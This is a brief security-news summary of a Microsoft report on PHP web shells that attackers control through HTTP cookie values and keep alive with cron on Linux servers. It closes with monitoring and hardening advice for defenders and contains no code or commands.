Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
Summary
Microsoft Defender Security Research Team has identified threat actors using HTTP cookies as a control channel for PHP web shells on Linux servers. This technique allows for remote code execution by embedding commands within cookie values, bypassing traditional methods like URL parameters or request bodies.
IFF Assessment
This is bad news for defenders as it introduces a novel and stealthier method for attackers to control compromised systems.
Defender Context
Defenders should be aware of this evolving technique, focusing on monitoring network traffic for unusual cookie usage and hardening web server configurations to prevent initial compromise and persistence. This highlights the need for advanced detection capabilities that can analyze application-layer protocols beyond just request bodies.